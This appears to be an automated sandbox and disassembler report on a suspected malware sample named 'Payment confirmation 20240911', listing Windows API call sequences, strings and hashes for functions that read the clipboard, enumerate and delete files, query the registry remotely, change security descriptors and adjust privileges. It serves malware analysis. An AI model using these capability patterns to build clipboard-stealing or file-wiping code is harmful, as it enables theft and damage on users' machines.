                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1867810238-1173974218
                                          • Opcode ID: 2f6999275aac0f62800ae5117c9c942b582edb6250484cb07d81495a19368580
                                          • Instruction ID: 8101f1bb296c25085ecedbcd597a2a41878a794c5f3563efceb8a9760c42433c
                                          • Opcode Fuzzy Hash: 2f6999275aac0f62800ae5117c9c942b582edb6250484cb07d81495a19368580
                                          • Instruction Fuzzy Hash: 1D512FB290016DAADF21EBA4DC95EEE77BCBF19308F4445D6D549A3041DB309B88CFA1
                                          APIs
                                          • OpenClipboard.USER32(0137DBF0), ref: 013370C3
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 013370D1
                                          • GetClipboardData.USER32 ref: 013370D9
                                          • CloseClipboard.USER32 ref: 013370E5
                                          • GlobalLock.KERNEL32(00000000), ref: 01337101
                                          • CloseClipboard.USER32 ref: 0133710B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 01337120
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0133712D
                                          • GetClipboardData.USER32 ref: 01337135
                                          • GlobalLock.KERNEL32(00000000), ref: 01337142
                                          • GlobalUnlock.KERNEL32(00000000), ref: 01337176
                                          • CloseClipboard.USER32 ref: 01337283
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                          • String ID:
                                          • API String ID: 3222323430-0
                                          • Opcode ID: 551f2ab0095b502cddcd2f152f0597c518e9b2e0814637b85b19bdd81fc53c0e
                                          • Instruction ID: 414872ccafa2a6642248c43083b2531074cc6c88b97adc77b787668e19c0618e
                                          • Opcode Fuzzy Hash: 551f2ab0095b502cddcd2f152f0597c518e9b2e0814637b85b19bdd81fc53c0e
                                          • Instruction Fuzzy Hash: 3A51C071304206ABD321EFA4CC99F7E77A8AB98B15F404519F686D61E0EB71D8058B62
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0132FE03
                                          • FindClose.KERNEL32(00000000), ref: 0132FE57
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0132FE7C
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0132FE93
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0132FEBA
                                          • __swprintf.LIBCMT ref: 0132FF06
                                          • __swprintf.LIBCMT ref: 0132FF3F
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • __swprintf.LIBCMT ref: 0132FF93
                                            • Part of subcall function 0130234B: __woutput_l.LIBCMT ref: 013023A4
                                          • __swprintf.LIBCMT ref: 0132FFE1
                                          • __swprintf.LIBCMT ref: 01330030
                                          • __swprintf.LIBCMT ref: 0133007F
                                          • __swprintf.LIBCMT ref: 013300CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 108614129-2428617273
                                          • Opcode ID: 5c739c3390187d1815a6cb3faa10e5c6b4ce96ed7e8a557112db7eee41e39661
                                          • Instruction ID: 1f6e7b90b34edf211d04ee8e577b200388981ecb8d2a4a2011b22a5eb0573115
                                          • Opcode Fuzzy Hash: 5c739c3390187d1815a6cb3faa10e5c6b4ce96ed7e8a557112db7eee41e39661
                                          • Instruction Fuzzy Hash: 8FA11DB2418345ABC315EFA4C894DBFB7ECAFA4704F84491DF585C6190EB34E948CBA2
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 01332065
                                          • _wcscmp.LIBCMT ref: 0133207A
                                          • _wcscmp.LIBCMT ref: 01332091
                                          • GetFileAttributesW.KERNEL32(?), ref: 013320A3
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 013320BD
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 013320D5
                                          • FindClose.KERNEL32(00000000), ref: 013320E0
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 013320FC
                                          • _wcscmp.LIBCMT ref: 01332123
                                          • _wcscmp.LIBCMT ref: 0133213A
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0133214C
                                          • SetCurrentDirectoryW.KERNEL32(01393A68), ref: 0133216A
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 01332174
                                          • FindClose.KERNEL32(00000000), ref: 01332181
                                          • FindClose.KERNEL32(00000000), ref: 01332191
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: d099c3d9d7a9ebf1b3a695299319439d71e4a428f924a7549529ae7036599445
                                          • Instruction ID: 606a1b477d957b3711d266e3851f2a0f3b52891a5d3c69877181b04aba8a7b7f
                                          • Opcode Fuzzy Hash: d099c3d9d7a9ebf1b3a695299319439d71e4a428f924a7549529ae7036599445
                                          • Instruction Fuzzy Hash: 2D31A675A00219BAEF20EBF9DD48EDF77ECAF85268F104056EA11E3190DB74DA44CB64
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 013321C0
                                          • _wcscmp.LIBCMT ref: 013321D5
                                          • _wcscmp.LIBCMT ref: 013321EC
                                            • Part of subcall function 01327606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 01327621
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0133221B
                                          • FindClose.KERNEL32(00000000), ref: 01332226
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 01332242
                                          • _wcscmp.LIBCMT ref: 01332269
                                          • _wcscmp.LIBCMT ref: 01332280
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 01332292
                                          • SetCurrentDirectoryW.KERNEL32(01393A68), ref: 013322B0
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 013322BA
                                          • FindClose.KERNEL32(00000000), ref: 013322C7
                                          • FindClose.KERNEL32(00000000), ref: 013322D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: 08a2464bfffaaf385445fe384d8b69c07c815c1c730f9ca6dd368dde458f8b00
                                          • Instruction ID: eb6b47f74cb4e024c4aa40010be1772f92b2c4523a8e3b0185f67697fc7143df
                                          • Opcode Fuzzy Hash: 08a2464bfffaaf385445fe384d8b69c07c815c1c730f9ca6dd368dde458f8b00
                                          • Instruction Fuzzy Hash: 7731E631A0121A6AEF61EFF8DC48EDF77ACAF9522CF104155E910E2190DB70DA85CB68
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove_memset
                                          • String ID: Q\E$[$\$\$\$]$^
                                          • API String ID: 3555123492-286096704
                                          • Opcode ID: ebbea73eb9fff8de326fc81a600f89d89b533947494df1d8104b0d9806f7f613
                                          • Instruction ID: e8bd442327b1e64888fd67bafe00b1f84944f46a954a54637dfbeedb39acfa91
                                          • Opcode Fuzzy Hash: ebbea73eb9fff8de326fc81a600f89d89b533947494df1d8104b0d9806f7f613
                                          • Instruction Fuzzy Hash: 1272C071D2021ACBDF28CF98C8856ADBBF5FF54318F5481A9D915AB381D374AE80CB90
                                          APIs
                                            • Part of subcall function 0131B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0131B903
                                            • Part of subcall function 0131B8E7: GetLastError.KERNEL32(?,0131B3CB,?,?,?), ref: 0131B90D
                                            • Part of subcall function 0131B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0131B3CB,?,?,?), ref: 0131B91C
                                            • Part of subcall function 0131B8E7: HeapAlloc.KERNEL32(00000000,?,0131B3CB,?,?,?), ref: 0131B923
                                            • Part of subcall function 0131B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0131B93A
                                            • Part of subcall function 0131B982: GetProcessHeap.KERNEL32(00000008,0131B3E1,00000000,00000000,?,0131B3E1,?), ref: 0131B98E
                                            • Part of subcall function 0131B982: HeapAlloc.KERNEL32(00000000,?,0131B3E1,?), ref: 0131B995
                                            • Part of subcall function 0131B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0131B3E1,?), ref: 0131B9A6
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0131B3FC
                                          • _memset.LIBCMT ref: 0131B411
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0131B430
                                          • GetLengthSid.ADVAPI32(?), ref: 0131B441
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0131B47E
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0131B49A
                                          • GetLengthSid.ADVAPI32(?), ref: 0131B4B7
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0131B4C6
                                          • HeapAlloc.KERNEL32(00000000), ref: 0131B4CD
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0131B4EE
                                          • CopySid.ADVAPI32(00000000), ref: 0131B4F5
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0131B526
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0131B54C
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0131B560
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 0f4ae9c003889d61da6210fc7ad31efc0d5579d33f8a5d916a12dd7f0d281f84
                                          • Instruction ID: 0c12c9df457702ed920f816a139a23e64216af996fafb6706a0118e1793f82c2
                                          • Opcode Fuzzy Hash: 0f4ae9c003889d61da6210fc7ad31efc0d5579d33f8a5d916a12dd7f0d281f84
                                          • Instruction Fuzzy Hash: C6512C71A0020AEFDF14DFA9D844AEEBB79FF04714F048129E915A7298DB35DA15CF60
                                          APIs
                                            • Part of subcall function 012E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 012E31DA
                                            • Part of subcall function 01327C0C: GetFileAttributesW.KERNEL32(?,01326A7B), ref: 01327C0D
                                          • _wcscat.LIBCMT ref: 01326E7E
                                          • __wsplitpath.LIBCMT ref: 01326E99
                                          • FindFirstFileW.KERNEL32(?,?), ref: 01326EAE
                                          • _wcscpy.LIBCMT ref: 01326EDD
                                          • _wcscat.LIBCMT ref: 01326EEF
                                          • _wcscat.LIBCMT ref: 01326F01
                                          • DeleteFileW.KERNEL32(?), ref: 01326F0E
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 01326F22
                                          • FindClose.KERNEL32(00000000), ref: 01326F3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                          • String ID: \*.*
                                          • API String ID: 2643075503-1173974218
                                          • Opcode ID: 225296647f0a196c24584edd6bc19e1edf021267184c218a0978082e02739c99
                                          • Instruction ID: e8001ca82be7d0f3720ebbdfe6f92bd145b134d72f84f2650af9d159f4ac487c
                                          • Opcode Fuzzy Hash: 225296647f0a196c24584edd6bc19e1edf021267184c218a0978082e02739c99
                                          • Instruction Fuzzy Hash: 6821D5B2409345AEC711EBA8C884DDFBBDCAF99218F444E1AF9D4C3041EB30D24D87A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                          • API String ID: 0-2893523900
                                          • Opcode ID: 8bcdf1c555b5afbd1327aee35e992d60dfe91e10c8645097612e6c9d96d050d5
                                          • Instruction ID: aaec50052261d018a893f8407e5458548d7eb47fd9c040349eab7263046e9a55
                                          • Opcode Fuzzy Hash: 8bcdf1c555b5afbd1327aee35e992d60dfe91e10c8645097612e6c9d96d050d5
                                          • Instruction Fuzzy Hash: 6462B271E2021A9BDF25CF98C8847AEBBF5BF58314F54816AE909EB285D770D940CF90
                                          APIs
                                            • Part of subcall function 01343AF7: CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0134317F
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0134321E
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 013432B6
                                          • RegCloseKey.ADVAPI32(000000FE), ref: 013434F5
                                          • RegCloseKey.ADVAPI32(00000000), ref: 01343502
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: b80844ea0bcd8fefc8c780975d8aafcaf674908ab5baa16a393118a23db666b8
                                          • Instruction ID: 3bf1aa9c7314dbeb04fbb2c20ca0af36f9f79401eea875e18acf2f50241f9e38
                                          • Opcode Fuzzy Hash: b80844ea0bcd8fefc8c780975d8aafcaf674908ab5baa16a393118a23db666b8
                                          • Instruction Fuzzy Hash: 1FE16D35204211AFCB15EF68C894D6ABBF8FF89318F04856DF58ADB261DB30E901CB51
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 086c45ff46f26927a85e30e0f820b075dfb2cf0b1863ec9eb984ba8a759a4f69
                                          • Instruction ID: 3d155d3d3837c75c07d065f14655bb921d15fe44da093f2e6f0801fe3a918cbb
                                          • Opcode Fuzzy Hash: 086c45ff46f26927a85e30e0f820b075dfb2cf0b1863ec9eb984ba8a759a4f69
                                          • Instruction Fuzzy Hash: 3121B231300215AFDB21AFA8D849B6D7BACEF44734F04C019F98ADB2A1DB75ED018B94
                                          APIs
                                            • Part of subcall function 0131A857: CLSIDFromProgID.OLE32 ref: 0131A874
                                            • Part of subcall function 0131A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 0131A88F
                                            • Part of subcall function 0131A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0131A89D
                                            • Part of subcall function 0131A857: CoTaskMemFree.OLE32(00000000), ref: 0131A8AD
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0133C6AD
                                          • _memset.LIBCMT ref: 0133C6BA
                                          • _memset.LIBCMT ref: 0133C7D8
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0133C804
                                          • CoTaskMemFree.OLE32(?), ref: 0133C80F
                                          Strings
                                          • NULL Pointer assignment, xrefs: 0133C85D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: e8d922d11722067e5a659205f30dc6b64da9cf9fc2d6684eef622987cfc2c8f2
                                          • Instruction ID: 6c3cd1975743a3188429853a023b0bc860fde9b3a67a72024631423ab223a9e8
                                          • Opcode Fuzzy Hash: e8d922d11722067e5a659205f30dc6b64da9cf9fc2d6684eef622987cfc2c8f2
                                          • Instruction Fuzzy Hash: 3E913A71D00219AFDB11DFA4DC84EEEBBB9AF59714F10812AE919A7280DB705A45CFA0
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 013324F6
                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 01332526
                                          • _wcscmp.LIBCMT ref: 0133253A
                                          • _wcscmp.LIBCMT ref: 01332555
                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 013325F3
                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 01332609
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: 50ce028d9ecf0b791fdf48aeaeac73aa4e841564020c6d869600bbe1a156b60e
                                          • Instruction ID: fcbf4e204e71d8453cadac22045bd451d732a9c01c1821491069e3dd0c16d7c3
                                          • Opcode Fuzzy Hash: 50ce028d9ecf0b791fdf48aeaeac73aa4e841564020c6d869600bbe1a156b60e
                                          • Instruction Fuzzy Hash: 2E418E7190420AEFEF15DFA8CC58AEFBBB8FF58318F104456E915A2290E7749A44CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                          • API String ID: 0-1546025612
                                          • Opcode ID: 42e6dd80428e1edc68398ade6f49d9c5d1877c317d1eb567864a4f2ae5c2e01c
                                          • Instruction ID: 69c8f2b639a9e7c0b6163a3d062303e6d72b0dc63ebd18419709b8de7aaf6dee
                                          • Opcode Fuzzy Hash: 42e6dd80428e1edc68398ade6f49d9c5d1877c317d1eb567864a4f2ae5c2e01c
                                          • Instruction Fuzzy Hash: F492BD70E1021ACBDF25CF5CC8487BDBBF5BB44318F9481AAE995AB285D77099C1CB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: dad5d0d6b533098b0acbfaeb75557fbfe475fc1fcc025e3d7b186eea42d5fc7d
                                          • Instruction ID: a6572c15e7b78e904378192458004a5f427d7ad3d028577b9c07e7852a7f44ef
                                          • Opcode Fuzzy Hash: dad5d0d6b533098b0acbfaeb75557fbfe475fc1fcc025e3d7b186eea42d5fc7d
                                          • Instruction Fuzzy Hash: 2E12CE70A1060ADFDF18DFA9C985ABEB7F5FF48304F504569E846E7250EB36A920CB50
                                          APIs
                                            • Part of subcall function 0131BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0131BF0F
                                            • Part of subcall function 0131BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0131BF3C
                                            • Part of subcall function 0131BEC3: GetLastError.KERNEL32 ref: 0131BF49
                                          • ExitWindowsEx.USER32(?,00000000), ref: 0132830C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
